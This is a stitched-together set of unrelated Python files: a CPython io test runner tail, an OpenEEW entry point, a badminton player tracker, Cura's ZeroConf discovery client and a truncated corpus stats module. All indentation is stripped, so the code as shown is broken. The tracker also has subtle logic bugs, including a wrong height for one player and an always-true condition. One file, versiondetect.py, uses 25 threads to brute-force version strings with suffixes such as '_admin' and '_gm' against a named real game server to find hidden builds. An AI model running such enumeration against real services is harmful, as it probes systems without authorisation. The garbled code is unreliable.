CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
main.py | """
This is the main file that runs the OpenEEW code package
"""
from threading import Thread
from params import params
from src import receive_topic, data_holders, ibm_topic
def main():
"""Does everything"""
# Create a Detections DataFrame.
detections = data_holders.Detections()
# Create a Events DataFrame.
events = data_holders.Events()
# We create and start receive detection worker
detection_rec = receive_topic.ReceiveTopic(
topic_list=detections, topic="detection", params=params
)
det_rec_process = Thread(target=detection_rec.run)
det_rec_process.start()
# We create and start receive event worker
event_rec = receive_topic.ReceiveTopic(
topic_list=events, topic="event", params=params
)
ev_rec_process = Thread(target=event_rec.run)
ev_rec_process.start()
# We create and start publish detection worker
detection_send = ibm_topic.Topic2IBM(
topic_list=detections, topic="detection", params=params
)
det_send_process = Thread(target=detection_send.run)
det_send_process.start()
# We create and start publish event worker
event_send = ibm_topic.Topic2IBM(topic_list=events, topic="event", params=params)
ev_send_process = Thread(target=event_send.run)
ev_send_process.start()
# We join our Threads, i.e. we wait for them to finish before continuing
det_rec_process.join()
ev_rec_process.join()
det_send_process.join()
ev_send_process.join()
if __name__ == "__main__":
main()
|
object_tracker_edit.py | import time, random
import numpy as np
from absl import app, flags, logging
from absl.flags import FLAGS
import cv2
import matplotlib.pyplot as plt
import tensorflow as tf
from yolov3_tf2.models import (
YoloV3
)
from yolov3_tf2.dataset import transform_images
from yolov3_tf2.utils import draw_outputs, convert_boxes
from deep_sort import preprocessing
from deep_sort import nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from tools import generate_detections as gdet
# from PIL import Image
from player import *
import threading
from tkinter import *
import time
import queue
##################################################################################################################
# Global Variables, can be translated to database if it becomes production
lcw = "Lee Chong Wei"
swh = "Son Wan Ho"
lyd = "Lee Yong Dae"
kgj = "Kim Gi Jung"
ksh = "Ko Sung Hyun"
yys = "Yo Yeon Seong"
csg = "Choi Sol Gyu"
wcl = "Wang Chi-Lin"
chl = "Chen Hung-Lin"
lcw_height = 1.72
swh_height = 1.77
lyd_height = 1.76
kkj_height = 1.79
ksh_height = 1.79
yys_height = 1.81
csg_height = 1.81
wcl_height = 1.86
chl_height = 1.77
##################################################################################################################
player_names1 = ["Player 1",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names2 = ["Player 2",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names3 = ["Player 3",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names4 = ["Player 4",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names5 = ["Player 4",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_heights = [lcw_height,swh_height,lyd_height,kkj_height,ksh_height,yys_height,csg_height]
##################################################################################################################
q = queue.Queue()
print("If no player is present, please at least select None")
def submit():
global name_1,name_2,name_3,name_4,name_5,height_1,height_2,height_3,height_4,height_5
name_1 = clicked1.get()
name_2 = clicked2.get()
name_3 = clicked3.get()
name_4 = clicked4.get()
name_5 = clicked5.get()
height_1 = playercheck(name_1)
height_2 = playercheck(name_2)
height_3 = playercheck(name_3)
height_4 = playercheck(name_4)
height_5 = playercheck(name_5)
# print(name_1,height_1,name_2,height_2,name_3,height_3,name_4,height_4,name_5,height_5)
return(name_1,height_1,name_2,height_2,name_3,height_3,name_4,height_4,name_5,height_5)
def playercheck(selection):
if selection == "Lee Chong Wei":
return lcw_height
elif selection == "Son Wan Ho":
return swh_height
elif selection == "Lee Yong Dae":
return swh_height
elif selection == "Kim Gi Jung":
return kkj_height
elif selection == "Ko Sung Hyun":
return ksh_height
elif selection == "Yo Yeon Seong":
return yys_height
elif selection == "Choi Sol Gyu":
return csg_height
elif selection == "Wang Chi-Lin":
return wcl_height
elif selection == "Chen Hung-Lin":
return chl_height
elif "None" or "Select Player" or "Player 1" or "Player 2" or "Player 3" or "Player 4":
return 1
else:
return 1
def playerselection():
window = Tk()
window.geometry('400x400')
window.title("Player Selection")
label1 = Label(window, text="Player 1: ")
label1.config(width=10, font=('Helvetica', 10))
label2 = Label(window, text="Player 2: ")
label2.config(width=10, font=('Helvetica', 10))
label3 = Label(window, text="Player 3: ")
label3.config(width=10, font=('Helvetica', 10))
label4 = Label(window, text="Player 4: ")
label4.config(width=10, font=('Helvetica', 10))
label5 = Label(window, text="If no player is present, please")
label6 = Label(window, text="at least select Player<Num>")
global label7, clicked1, clicked2, clicked3, clicked4, clicked5
label7 = Label(window, text="Test")
label7.config(width=10, font=('Helvetica', 10))
label1.grid(row=0,column=0)
label2.grid(row=1,column=0)
label3.grid(row=2,column=0)
label4.grid(row=3,column=0)
label5.grid(row=5,column=0)
label6.grid(row=5,column=1)
label7.grid(row=4,column=0)
clicked1 = StringVar()
clicked1.set("Select Player")
clicked2 = StringVar()
clicked2.set("Select Player")
clicked3 = StringVar()
clicked3.set("Select Player")
clicked4 = StringVar()
clicked4.set("Select Player")
clicked5 = StringVar()
clicked5.set("Select Player")
drop1 = OptionMenu(window, clicked1, *player_names1)
drop1.config(width=20, font=('Helvetica', 10))
drop2 = OptionMenu(window, clicked2, *player_names2)
drop2.config(width=20, font=('Helvetica', 10))
drop3 = OptionMenu(window, clicked3, *player_names3)
drop3.config(width=20, font=('Helvetica', 10))
drop4 = OptionMenu(window, clicked4, *player_names4)
drop4.config(width=20, font=('Helvetica', 10))
drop5 = OptionMenu(window, clicked5, *player_names5)
drop5.config(width=20, font=('Helvetica', 10))
drop1.grid(row=0,column=1)
drop2.grid(row=1,column=1)
drop3.grid(row=2,column=1)
drop4.grid(row=3,column=1)
drop5.grid(row=4,column=1)
labelTest1 = Label(text="", font=('Helvetica', 8), fg='red')
labelTest1.grid(row=4,column=1)
labelTest2 = Label(text="", font=('Helvetica', 8), fg='red')
labelTest2.grid(row=5,column=1)
labelTest3 = Label(text="", font=('Helvetica', 8 ), fg='red')
labelTest3.grid(row=6,column=1)
labelTest4 = Label(text="", font=('Helvetica', 8), fg='red')
labelTest4.grid(row=7,column=1)
window.mainloop()
##################################################################################################################
flags.DEFINE_string('classes', './data/labels/coco.names', 'path to classes file')
flags.DEFINE_string('weights', './weights/yolov3.tf',
'path to weights file')
flags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_string('video', './data/video/test.mp4',
'path to video file or number for webcam)')
flags.DEFINE_string('output', None, 'path to output video')
flags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')
flags.DEFINE_integer('num_classes', 80, 'number of classes in the model')
##################################################################################################################
def main(_argv):
# Definition of the parameters
max_cosine_distance = 0.5
nn_budget = None
nms_max_overlap = 1.0
#initialize deep sort
model_filename = 'model_data/mars-small128.pb'
encoder = gdet.create_box_encoder(model_filename, batch_size=1)
metric = nn_matching.NearestNeighborDistanceMetric("cosine", max_cosine_distance, nn_budget)
tracker = Tracker(metric)
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
if FLAGS.tiny:
yolo = YoloV3Tiny(classes=FLAGS.num_classes)
else:
yolo = YoloV3(classes=FLAGS.num_classes)
yolo.load_weights(FLAGS.weights)
logging.info('weights loaded')
class_names = [c.strip() for c in open(FLAGS.classes).readlines()]
logging.info('classes loaded')
try:
vid = cv2.VideoCapture(int(FLAGS.video))
except:
vid = cv2.VideoCapture(FLAGS.video)
out = None
if FLAGS.output:
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*FLAGS.output_format)
out = cv2.VideoWriter(FLAGS.output, codec, fps, (width, height))
list_file = open('detection.txt', 'w')
frame_index = -1
fps = 0.0
count = 0
while True:
_, img = vid.read()
img_in = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_in = tf.expand_dims(img_in, 0)
img_in = transform_images(img_in, FLAGS.size)
t1 = time.time()
boxes, scores, classes, nums = yolo.predict(img_in)
classes = classes[0]
names = []
for i in range(len(classes)):
names.append(class_names[int(classes[i])])
names = np.array(names)
converted_boxes = convert_boxes(img, boxes[0])
features = encoder(img, converted_boxes)
detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in zip(converted_boxes, scores[0], names, features)]
#initialize color map
cmap = plt.get_cmap('tab20b')
colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]
# run non-maxima suppresion
boxs = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
classes = np.array([d.class_name for d in detections])
indices = preprocessing.non_max_suppression(boxs, classes, nms_max_overlap, scores)
detections = [detections[i] for i in indices]
# Call the tracker
tracker.predict()
tracker.update(detections)
for track in tracker.tracks:
if not track.is_confirmed() or track.time_since_update > 1:
continue
submit()
bbox = track.to_tlbr()
class_name = track.get_class()
color = colors[int(track.track_id) % len(colors)]
color = [i * 255 for i in color]
cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 1)
cv2.rectangle(img, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(class_name)+len(str(track.track_id)))*17, int(bbox[1])), color, -1)
# if name_1 == "Select Player" or name_2 == "Select Player" or name_3 == "Select Player" or name_4 == "Select Player" or name_5 == "Select Player" or height_1 == NameError or height_2 == NameError or height_3 == NameError or height_4 == NameError or height_5 == NameError:
# cv2.putText(img, class_name + "-" + str(track.track_id),(int(bbox[0]), int(bbox[1]-10)),0, 0.75, (255,255,255),2)
if class_name+str(track.track_id) == "Player1":
cv2.putText(img, name_1 ,(int(bbox[0]), int(bbox[1]-10)),0, 0.75, (255,255,255),2)
# print("1: ", int(bbox[3]))
s_height0 = ((int(bbox[3])-(int(bbox[1])))/height_1)*1.15
new_height_player1 = int(int(bbox[3])-int(s_height0))
cv2.line(img, (int(bbox[0]), int(new_height_player1)), (int(bbox[2]), int(new_height_player1)), (0,255,0), 2)
if class_name+str(track.track_id) == "Player2":
cv2.putText(img, name_2,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height1 = ((int(bbox[3])-(int(bbox[1])))/height_2)*1.15
new_height_player2 = int(int(bbox[3])-int(s_height1))
cv2.line(img, (int(bbox[0]), int(new_height_player2)), (int(bbox[2]), int(new_height_player2)), (0,255,0), 2)
if class_name+str(track.track_id) == "Player3":
cv2.putText(img, name_3,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height2 = ((int(bbox[3])-(int(bbox[1])))/height_3)*1.15
new_height_player3 = int(int(bbox[3])-int(s_height2))
cv2.line(img, (int(bbox[0]), int(new_height_player3)), (int(bbox[2]), int(new_height_player3)), (0,255,0), 2)
if class_name+str(track.track_id) == "Player4":
cv2.putText(img, name_4,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height3 = ((int(bbox[3])-(int(bbox[1])))/height_4)*1.15
new_height_player4 = int(int(bbox[3])-int(s_height3))
cv2.line(img, (int(bbox[0]), int(new_height_player4)), (int(bbox[2]), int(new_height_player4)), (0,255,0), 2)
if class_name+str(track.track_id) not in {'Player1','Player2','Player3','Player4'}:
label7.configure(text=class_name+str(track.track_id))
if class_name+str(track.track_id) == "Player"+str(track.track_id):
cv2.putText(img, name_5,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height4 = ((int(bbox[3])-(int(bbox[1])))/height_5)*1.15
new_height_player5 = int(int(bbox[3])-int(s_height4))
cv2.line(img, (int(bbox[0]), int(new_height_player5)), (int(bbox[2]), int(new_height_player5)), (0,255,0), 2)
### UNCOMMENT BELOW IF YOU WANT CONSTANTLY CHANGING YOLO DETECTIONS TO BE SHOWN ON SCREEN
#for det in detections:
# bbox = det.to_tlbr()
# cv2.rectangle(img,(int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])),(255,0,0), 2)
# print fps on screen
fps = ( fps + (1./(time.time()-t1)) ) / 2
cv2.putText(img, "FPS: {:.2f}".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
cv2.imshow('output', img)
if FLAGS.output:
out.write(img)
frame_index = frame_index + 1
list_file.write(str(frame_index)+' ')
if len(converted_boxes) != 0:
for i in range(0,len(converted_boxes)):
list_file.write(str(converted_boxes[i][0]) + ' '+str(converted_boxes[i][1]) + ' '+str(converted_boxes[i][2]) + ' '+str(converted_boxes[i][3]) + ' ')
list_file.write('\n')
# press q to quit
if cv2.waitKey(1) == ord('q'):
break
vid.release()
if FLAGS.output:
out.release()
list_file.close()
cv2.destroyAllWindows()
if __name__ == '__main__':
try:
x = threading.Thread(target=playerselection)
x.start()
y = threading.Thread(target=app.run(main))
y.start()
# app.run(main)
except SystemExit:
pass
|
ZeroConfClient.py | # Copyright (c) 2019 Ultimaker B.V.
# Cura is released under the terms of the LGPLv3 or higher.
from queue import Queue
from threading import Thread, Event
from time import time
from typing import Optional
from zeroconf import Zeroconf, ServiceBrowser, ServiceStateChange, ServiceInfo
from UM.Logger import Logger
from UM.Signal import Signal
from cura.CuraApplication import CuraApplication
## The ZeroConfClient handles all network discovery logic.
# It emits signals when new network services were found or disappeared.
class ZeroConfClient:
# The discovery protocol name for Ultimaker printers.
ZERO_CONF_NAME = u"_ultimaker._tcp.local."
# Signals emitted when new services were discovered or removed on the network.
addedNetworkCluster = Signal()
removedNetworkCluster = Signal()
def __init__(self) -> None:
self._zero_conf = None # type: Optional[Zeroconf]
self._zero_conf_browser = None # type: Optional[ServiceBrowser]
self._service_changed_request_queue = None # type: Optional[Queue]
self._service_changed_request_event = None # type: Optional[Event]
self._service_changed_request_thread = None # type: Optional[Thread]
## The ZeroConf service changed requests are handled in a separate thread so we don't block the UI.
# We can also re-schedule the requests when they fail to get detailed service info.
# Any new or re-reschedule requests will be appended to the request queue and the thread will process them.
def start(self) -> None:
self._service_changed_request_queue = Queue()
self._service_changed_request_event = Event()
try:
self._zero_conf = Zeroconf()
# CURA-6855 catch WinErrors
except OSError:
Logger.logException("e", "Failed to create zeroconf instance.")
return
self._service_changed_request_thread = Thread(target = self._handleOnServiceChangedRequests, daemon = True, name = "ZeroConfServiceChangedThread")
self._service_changed_request_thread.start()
self._zero_conf_browser = ServiceBrowser(self._zero_conf, self.ZERO_CONF_NAME, [self._queueService])
# Cleanup ZeroConf resources.
def stop(self) -> None:
if self._zero_conf is not None:
self._zero_conf.close()
self._zero_conf = None
if self._zero_conf_browser is not None:
self._zero_conf_browser.cancel()
self._zero_conf_browser = None
## Handles a change is discovered network services.
def _queueService(self, zeroconf: Zeroconf, service_type, name: str, state_change: ServiceStateChange) -> None:
item = (zeroconf, service_type, name, state_change)
if not self._service_changed_request_queue or not self._service_changed_request_event:
return
self._service_changed_request_queue.put(item)
self._service_changed_request_event.set()
## Callback for when a ZeroConf service has changes.
def _handleOnServiceChangedRequests(self) -> None:
if not self._service_changed_request_queue or not self._service_changed_request_event:
return
while True:
# Wait for the event to be set
self._service_changed_request_event.wait(timeout=5.0)
# Stop if the application is shutting down
if CuraApplication.getInstance().isShuttingDown():
return
self._service_changed_request_event.clear()
# Handle all pending requests
reschedule_requests = [] # A list of requests that have failed so later they will get re-scheduled
while not self._service_changed_request_queue.empty():
request = self._service_changed_request_queue.get()
zeroconf, service_type, name, state_change = request
try:
result = self._onServiceChanged(zeroconf, service_type, name, state_change)
if not result:
reschedule_requests.append(request)
except Exception:
Logger.logException("e", "Failed to get service info for [%s] [%s], the request will be rescheduled",
service_type, name)
reschedule_requests.append(request)
# Re-schedule the failed requests if any
if reschedule_requests:
for request in reschedule_requests:
self._service_changed_request_queue.put(request)
## Handler for zeroConf detection.
# Return True or False indicating if the process succeeded.
# Note that this function can take over 3 seconds to complete. Be careful calling it from the main thread.
def _onServiceChanged(self, zero_conf: Zeroconf, service_type: str, name: str, state_change: ServiceStateChange
) -> bool:
if state_change == ServiceStateChange.Added:
return self._onServiceAdded(zero_conf, service_type, name)
elif state_change == ServiceStateChange.Removed:
return self._onServiceRemoved(name)
return True
## Handler for when a ZeroConf service was added.
def _onServiceAdded(self, zero_conf: Zeroconf, service_type: str, name: str) -> bool:
# First try getting info from zero-conf cache
info = ServiceInfo(service_type, name, properties={})
for record in zero_conf.cache.entries_with_name(name.lower()):
info.update_record(zero_conf, time(), record)
for record in zero_conf.cache.entries_with_name(info.server):
info.update_record(zero_conf, time(), record)
if info.address:
break
# Request more data if info is not complete
if not info.address:
info = zero_conf.get_service_info(service_type, name)
if info:
type_of_device = info.properties.get(b"type", None)
if type_of_device:
if type_of_device == b"printer":
address = '.'.join(map(lambda n: str(n), info.address))
self.addedNetworkCluster.emit(str(name), address, info.properties)
else:
Logger.log("w", "The type of the found device is '%s', not 'printer'." % type_of_device)
else:
Logger.log("w", "Could not get information about %s" % name)
return False
return True
## Handler for when a ZeroConf service was removed.
def _onServiceRemoved(self, name: str) -> bool:
Logger.log("d", "ZeroConf service removed: %s" % name)
self.removedNetworkCluster.emit(str(name))
return True
|
versiondetect.py | from http import client as httpsconn
import queue
import threading
import time
#import config
wf=open('./versions.txt',mode='w')
def write_version(s):
global wf
wf.write(s+'\n')
def trystr():
while True:
s=versions.get()
conn=httpsconn.HTTPSConnection('zjzksvr.xiimoon.com',port=443)
conn.connect()
url='/resource/get?version='+s
conn.request('GET',url)
resp=conn.getresponse()
data=resp.read()
#print(data)
if (r'"retcode":"0"') in str(data):
print(s)
write_version(s)
else:
continue
print('fail:',s)
def gen_version():
global versions
for v1 in range(0,15):
for v2 in range(0,15):
print('try:',v1,' ',v2)
for v3 in range(0,15):
for suffix in ('','_elite','_admin','_manage','_internal','_gm'):
versions.put(str(v1)+'.'+str(v2)+'.'+str(v3)+suffix)
versions=queue.Queue(800)
threadlist=[]
threadlist.append(threading.Thread(target=gen_version))
for i in range(0,25):
threadlist.append(threading.Thread(target=trystr))
for item in threadlist:
item.start()
while threading.active_count()>0:
time.sleep(1) |
stats_multi_proc.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# : XXX{Information about this code}XXX
# Author:
# c(Developer) -> {'Egor Savin'}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###Programm Info######
#
#
#
#
#
import os
import sys
from raven import Client
import types
#import Queue
import enlighten
import json
from collections import defaultdict,Counter,OrderedDict
import copy
import threading
import time
from itertools import izip
import re
import Stemmer
import multiprocessing as mp
from multiprocessing import Value, Process, Manager,Pipe,Queue#, BaseManager, DictProxy
from ctypes import c_bool
import gc
#from multiprocessing import Queue
from zas_rep_tools.src.utils.helpers import intern_sender,DeepDict,MyMultiManager,set_class_mode, print_mode_name, path_to_zas_rep_tools, Rle, categorize_token_list, get_categories, instance_info, SharedCounterExtern, SharedCounterIntern, Status,function_name,statusesTstring, ngrams,nextLowest, get_number_of_streams_adjust_cpu,LenGen,DefaultOrderedDict, from_ISO639_2, to_ISO639_2,MyThread
from zas_rep_tools.src.classes.dbhandler import DBHandler
from zas_rep_tools.src.classes.reader import Reader
from zas_rep_tools.src.classes.corpus import Corpus
from zas_rep_tools.src.classes.exporter import Exporter
from zas_rep_tools.src.utils.zaslogger import ZASLogger
from zas_rep_tools.src.utils.debugger import p
from zas_rep_tools.src.utils.error_tracking import initialisation
from zas_rep_tools.src.utils.traceback_helpers import print_exc_plus
from zas_rep_tools.src.classes.basecontent import BaseContent, BaseDB
import zas_rep_tools.src.utils.db_helper as db_helper
from zas_rep_tools.src.utils.custom_exceptions import ZASCursorError, ZASConnectionError,DBHandlerError,ProcessError,ErrorInsertion,ThreadsCrash
#from sortedcontainers import SortedDict
import platform
if platform.uname()[0].lower() !="windows":
import colored_traceback
colored_traceback.add_hook()
else:
import colorama
class Stats(BaseContent,BaseDB):
phenomena_table_map = {
"repl":"replications",
"redu":"reduplications",
"baseline":"baseline",
}
supported_rep_type = set(("repl", "redu"))
supported_phanomena_to_export = supported_rep_type.union(set(("baseline",)))
supported_syntagma_type= set(("lexem", "pos"))
supported_sentiment = set(("negative","positive","neutral"))
output_tables_types = set(("sum", "exhausted"))
output_tables_col_names = {
"baseline":{
"all":"occur_syntagma_all",
"repl":{
"uniq":"occur_repl_uniq",
"exhausted":"occur_repl_exhausted",
},
"redu":{
"uniq":"occur_redu_uniq",
"exhausted":"occur_redu_exhausted",
}
}
}
min_col = {
"repl":('id','doc_id', "redufree_len",'index_in_corpus','index_in_redufree','normalized_word', 'stemmed',"in_redu"),
"redu":('id','doc_id', "redufree_len",'index_in_corpus', 'index_in_redufree',"redu_length",'normalized_word','stemmed'),
"baseline":["syntagma", "occur_syntagma_all", "scope",'stemmed'],
}
_non_pos_tags = set(["EMOIMG", "EMOASC", "number", "symbol", "hashtag", "mention","regular"])
header_order_to_export = ("baseline", "document", "word", "repl", "redu", "context")
def __init__(self, status_bar=True,log_ignored=True,**kwargs):
super(type(self), self).__init__(**kwargs)
#Input: Encapsulation:
self._status_bar = status_bar
self._log_ignored= log_ignored
#self._preprocession = preprocession
self.locker = threading.Lock()
#InstanceAttributes: Initialization
self.statsdb = False
self.corp = False
self._corp_info = False
self.corpdb_defaultname = "corpus"
self.attached_corpdb_name = False
self._doc_id_tag = db_helper.doc_id_tag
#self._baseline_delimiter = baseline_delimiter
#self._init_compution_variables()
#self.preprocessors = self.mgr.defaultdict(lambda: self.mgr.defaultdict(dict)
#self.preprocessors = self.mgr.DeepDict( self.mgr.CallableDict() )
#self.x = self.manager.list()
#self.mgr = MyMultiManager()
#self.mgr.start()
#self._init_preprocessors(thread_name="Thread0")
self._init_main_variables()
self.logger.debug('Intern InstanceAttributes was initialized')
self.logger.debug('An instance of Stats() was created ')
## Log Settings of the Instance
attr_to_flag = False
attr_to_len = False
self._log_settings(attr_to_flag =attr_to_flag,attr_to_len =attr_to_len)
############################################################
####################__init__end#############################
############################################################
def __del__(self):
super(type(self), self).__del__()
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################Extern########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
def _init_main_variables(self):
self.mgr = MyMultiManager()
self.mgr.start()
self.preprocessors = self.mgr.DeepDict( self.mgr.CallableDict() )
self._init_preprocessors(thread_name="Thread0")
def _init_compution_variables(self):
self._init_main_variables()
self.mgr = MyMultiManager()
self.mgr.start()
#p("-11")
self.threads_error_bucket = Queue()
self.threads_status_bucket = Queue()
self.threads_success_exit = []
self.threads_unsuccess_exit = []
self._threads_num = 0
#p("-222")
self.status_bars_manager = self._get_status_bars_manager()
#p("-333")
#p("-555")
#self.baseline_replication = defaultdict(lambda:defaultdict(lambda: 0) )
#self.baseline_reduplication = defaultdict(lambda:defaultdict(lambda: 0) )
self._terminated = Value(c_bool, False)
self._close_db_writer = Value(c_bool, False)
#p("-666")
#self.baseline_ngramm_lenght = self._context_left + 1 +self._context_lenght
self.temporized_baseline = defaultdict(int)
self.active_threads = []
self.main_status_bar_of_insertions = False
self._timer_on_main_status_bar_was_reset = False
self._start_time_of_the_last_insertion = False
self._end_time_of_the_last_insertion = False
self._last_insertion_was_successfull = False
self.counters_attrs = defaultdict(lambda:defaultdict(dict))
#self._avaliable_scope = self._context_lenght+1
self.force_cleaning_flags = set()
self.ignored_pos = set(["URL", "U"])
self.baseline_insrt_process = False
self._text_field_name = "text"
self._id_field_name = "id"
#p("-999")
self.temporized_repl = defaultdict(list)
self.temporized_redu = defaultdict(list)
self._repls_cols = self.statsdb.col("replications")
self._redus_cols = self.statsdb.col("reduplications")
self._cleaned_tags = {
"number":":number:",
"URL":":URL:",
"symbol":":symbol:",
"mention":":mention:",
"hashtag":":hashtag:",
}
#p("-10000")
###########################INITS + Open##########################
def _init_column_index_variables(self):
self.col_index_orig = {
"repl":{colname:index for index,colname in enumerate(self.statsdb.col("replications") )},
"redu":{colname:index for index,colname in enumerate(self.statsdb.col("reduplications") )},
"baseline":{colname:index for index,colname in enumerate(self.statsdb.col("baseline") )},
}
self.col_index_min = {
"repl":{colname:index for index,colname in enumerate(Stats.min_col["repl"])},
"redu":{colname:index for index,colname in enumerate(Stats.min_col["redu"])},
"baseline":{colname:index for index,colname in enumerate(Stats.min_col["baseline"] )},
#"baseline":{colname:index for index,colname in enumerate(self.statsdb.col("baseline") )},
}
# self.col_index_repl = {colname:index for index,colname in enumerate(self.statsdb.col("replications") )}
# self.col_index_redu = {colname:index for index,colname in enumerate(self.statsdb.col("reduplications") )}
# self.col_index_baseline = {colname:index for index,colname in enumerate(self.statsdb.col("baseline") )}
# self._contextR1index = {
# "repl":self._get_col_index("contextR1", "replications"),
# "redu":self._get_col_index("contextR1", "reduplications")
# }
# self._normalized_word_index = {
# "repl":self._get_col_index("normalized_word", "replications"),
# "redu":self._get_col_index("normalized_word", "reduplications")
# }
# self._doc_id_index = {
# "repl":self._get_col_index("doc_id", "replications"),
# "redu":self._get_col_index("doc_id", "reduplications")
# }
# self._adress_index = {
# "repl":self._get_col_index("token_index", "replications"),
# "redu":self._get_col_index("start_index", "reduplications")
# }
# self._rep_id = {
# "repl":self._get_col_index("repl_id", "replications"),
# "redu":self._get_col_index("redu_id", "reduplications")
# }
def additional_attr(self, repl_up,ignore_hashtag,ignore_url,
ignore_mention,ignore_punkt,ignore_num,force_cleaning,
case_sensitiv,full_repetativ_syntagma,
min_scope_for_indexes,baseline_delimiter):
additional_attributes = {
"repl_up":repl_up,
#"log_ignored":log_ignored,
"ignore_hashtag":ignore_hashtag,
"ignore_url":ignore_url,
"ignore_mention":ignore_mention,
"ignore_punkt":ignore_punkt,
"ignore_num":ignore_num,
"force_cleaning":force_cleaning ,
"case_sensitiv":case_sensitiv,
"full_repetativ_syntagma":full_repetativ_syntagma,
"full_repetativ_syntagma": full_repetativ_syntagma,
"min_scope_for_indexes":min_scope_for_indexes,
"baseline_delimiter":baseline_delimiter,
}
return additional_attributes
def init(self, prjFolder, DBname, language, visibility, corpus_id=None,
encryption_key=False,fileName=False, version=False, stats_id=False,
context_lenght=5, full_repetativ_syntagma=False, min_scope_for_indexes=2,
repl_up=3, ignore_hashtag=False, force_cleaning=False,baseline_delimiter="|+|",
case_sensitiv=False,ignore_url=False, ignore_mention=False, ignore_punkt=False, ignore_num=False):
if self.statsdb:
self.logger.error("StatsInitError: An active Stats Instance was found. Please close already initialized/opened Stats, before new initialization.", exc_info=self._logger_traceback)
return False
if context_lenght < 3:
self.logger.error("Given Context-Length is lower as an allow minimum, which is 3.")
return False
self.statsdb = DBHandler( **self._init_attributesfor_dbhandler())
was_initialized = self.statsdb.init("stats", prjFolder, DBname, language, visibility, corpus_id=corpus_id,
encryption_key=encryption_key,fileName=fileName, version=version,
stats_id=stats_id, db_frozen=False, context_lenght=context_lenght )
if not was_initialized:
self.logger.error("StatsInit: Current Stats for following attributes wasn't initialized: 'dbtype='{}'; 'dbname'='{}; corp_id='{}'; 'stats_id'='{}'; encryption_key='{}'; .".format("stats", DBname,corpus_id, stats_id,encryption_key))
return False
if self.statsdb.exist():
self.add_context_columns( context_lenght)
additional_attributes = self.additional_attr(repl_up,ignore_hashtag,ignore_url,
ignore_mention,ignore_punkt,ignore_num,force_cleaning,
case_sensitiv,full_repetativ_syntagma,min_scope_for_indexes,baseline_delimiter)
self.statsdb.update_attrs(additional_attributes)
self.statsdb.update_attr("locked", False)
self.set_all_intern_attributes_from_db()
self.logger.settings("InitStatsDBAttributes: {}".format( instance_info(self.statsdb.get_all_attr(), attr_to_len=False, attr_to_flag=False, as_str=True)))
self.logger.debug("StatsInit: '{}'-Stats was successful initialized.".format(DBname))
self._init_column_index_variables()
self.baseline_ngramm_lenght = 1 +self._context_lenght
return True
else:
self.logger.error("StatsInit: '{}'-Stats wasn't initialized.".format(DBname), exc_info=self._logger_traceback)
return False
def close(self):
self.statsdb.close()
self.statsdb = False
self.corp = False
self._corp_info = False
self.attached_corpdb_name = False
def _close(self):
self.statsdb._close()
self.statsdb = False
self.corp = False
self._corp_info = False
self.attached_corpdb_name = False
